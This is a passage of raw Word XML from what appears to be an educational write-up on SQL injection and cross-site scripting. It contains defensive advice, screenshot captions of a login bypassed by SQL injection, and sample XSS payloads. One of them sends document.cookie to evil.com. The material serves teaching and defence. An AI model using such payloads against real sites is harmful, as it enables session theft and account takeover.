          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>Supplied Input Additional Defenses:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD489C5" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="56"/>
        <w:ind w:right="522" w:hanging="262"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Also: Enforcing Least Privilege </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6399C" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="115"/>
        <w:ind w:right="522" w:hanging="262"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Also: Performing Allow-list Input Validation as a Secondary Defense </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CCF6DA" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="233" w:right="639"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The best way to prevent SQL Injections is to use safe programming functions that make SQL Injections impossible: parameterized queries (prepared statements) and stored procedures. Every major programming language currently has such safe functions and every developer should only use such safe functions to work with the database. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0226F998" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41DB04" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757BF507" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7416D0" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As a general rule of thumb: if you find yourself writing SQL statements by concatenating strings, think very carefully about what you are doing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139BFA6A" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E2679B" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="233" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You need to be very careful to escape characters everywhere in your codebase where an SQL statement is constructed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ADA0DE" w14:textId="3D4F873C" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080CD9" w:rsidRPr="00080CD9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4230416B" wp14:editId="00CC6BC8">
            <wp:extent cx="6058535" cy="415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8535" cy="4155440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F03EFC0" w14:textId="7B7B485F" w:rsidR="00080CD9" w:rsidRPr="00080CD9" w:rsidRDefault="00080CD9" w:rsidP="00080CD9">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080CD9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Entering Correct Username and Password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181CCB7B" w14:textId="697086FF" w:rsidR="00080CD9" w:rsidRPr="00DE7961" w:rsidRDefault="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="double"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B63536">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="double"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CF7CC31" wp14:editId="52122C26">
            <wp:extent cx="5629941" cy="3877407"/>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7255" cy="3882444"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0B512C" w14:textId="77777777" w:rsidR="00B63536" w:rsidRDefault="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="7" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Successfully Logged in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27573C7E" w14:textId="77777777" w:rsidR="00B63536" w:rsidRDefault="00B63536" w:rsidP="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="7" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B63536">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="618B9793" wp14:editId="46828DDC">
            <wp:extent cx="5591908" cy="3851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6403" cy="3854308"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31012C48" w14:textId="1C6D6891" w:rsidR="00842E6C" w:rsidRDefault="00B63536" w:rsidP="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="7" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C515074" w14:textId="5FCF4665" w:rsidR="00B63536" w:rsidRDefault="00B63536" w:rsidP="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="7" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B63536">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="201003CB" wp14:editId="3FB20815">
            <wp:extent cx="5609492" cy="386332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4547" cy="3866806"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="224B1877" w14:textId="5F556C75" w:rsidR="00842E6C" w:rsidRDefault="00B63536" w:rsidP="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="7" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logged in after SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="000E5BEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F64CEC" w14:textId="12225778" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="46" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8256F5" w14:textId="054ECFF9" w:rsidR="00B63536" w:rsidRDefault="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="46" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8D2434" w14:textId="77777777" w:rsidR="00B63536" w:rsidRDefault="00B63536">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="46" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F1BC58" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="11" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="46" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D3682B" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="233" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314FF830" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="119" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="238" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F1169D" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="233" w:right="430"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FD6252" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB1C319" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="233" w:right="431"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A web page or web application is vulnerable to XSS if it uses unsensitized user input in the output that it generates. This user input must then be parsed by the victim’s browser. XSS attacks are possible in VBScript, ActiveX, Flash, and even CSS. However, they are most common in JavaScript, primarily because JavaScript is fundamental to most browsing experiences. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679671B8" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="238" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11957F4E" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JavaScript can still be dangerous if misused as part of malicious content: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F41968C" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="67"/>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Malicious JavaScript has access to all the objects that the rest of the web page has access to. This includes access to the user’s cookies. Cookies are often used to store session tokens. If an attacker can obtain a user’s session cookie, they can impersonate that user, perform actions on behalf of the user, and gain access to the user’s sensitive data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02395014" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JavaScript can read the browser DOM and make arbitrary modifications to it. Luckily, this is only possible within the page where JavaScript is running. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC1D339" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="41"/>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JavaScript can use the XMLHttpRequest object to send HTTP requests with arbitrary content to arbitrary destinations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D12840" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JavaScript in modern browsers can use HTML5 APIs. For example, it can gain access to the user’s geolocation, webcam, microphone, and even specific files from the user’s file system. Most of these APIs require user opt-in, but the attacker can use social engineering to go around that limitation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4401D114" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="66"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following is a snippet of server-side pseudocode that is used to display the most recent comment on a web page: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BEBE17" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="3" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="5334" w:firstLine="235"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">print "&lt;html&gt;" print "&lt;h1&gt;Most recent comment&lt;/h1&gt;" print database.latestComment print "&lt;/html&gt;" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748F3951" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="3" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="230" w:right="1640"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;doSomethingEvil ();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3596C4C6" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="3" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="230" w:right="1640"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7407AC94" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="235" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574A2FF" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="235" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E0CF1" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="88" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="235" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38636081" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="103"/>
        <w:ind w:left="10" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stealing Cookies Using XSS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5779FE5E" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="66"/>
        <w:ind w:left="233" w:right="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Criminals often use XSS to steal cookies. This allows them to impersonate the victim. The attacker can send the cookie to their own server in many ways. One of them is to execute the following client-side script in the victim’s browser: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E203D41" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="3" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="230" w:right="1640"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DAD00A" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="96" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="230" w:right="1640"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.location="http://evil.com/?cookie=" + document.cookie &lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266BD8FD" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="235" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12703515" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="65" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="425" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C51C723" wp14:editId="38514A01">
            <wp:extent cx="5542788" cy="2464308"/>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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5542788" cy="2464308"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B131EE" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="235" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D5665B" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="235" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC4844D" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="235" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6014769B" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For example, '&amp;lt;' is the HTML encoding for the '&lt;' character. If you include: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C17033C" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="198" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="230" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('testing') &lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E3CFFD" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="127"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">in the HTML of a page, the script will execute. But if you include: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF09C7" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="198" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="230" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;lt;script&amp;gt; alert('testing')&amp;lt;/script&amp;gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D171493" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:ind w:left="233"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">in the HTML of a page, it will print out the text "&lt;script&gt;alert('testing') &lt;/script&gt;", but it will not actually execute the script. By escaping the &lt;script&gt; tags, we prevented the script from executing. Technically, what we did here is "encoding" not "escaping", but "escaping" conveys the basic concept (and we'll see later that in the case of JavaScript, "escaping" actually is the correct term). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097D19DB" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:ind w:left="233" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following can help minimize the chances that your website will contain XSS vulnerabilities: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F55A0DB" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="51"/>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using a template system with context-aware auto-escaping. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3308B12D" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="51"/>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manually escaping user input (if it’s not possible to use a template system with context- aware auto-escaping). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F81C6FD" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="51"/>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding common browser behaviors that lead to XSS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BBC83A" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="13"/>
        <w:ind w:right="522" w:hanging="259"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Learning the best practices for your technology. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFD3DB4" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="5" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434D3B1" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
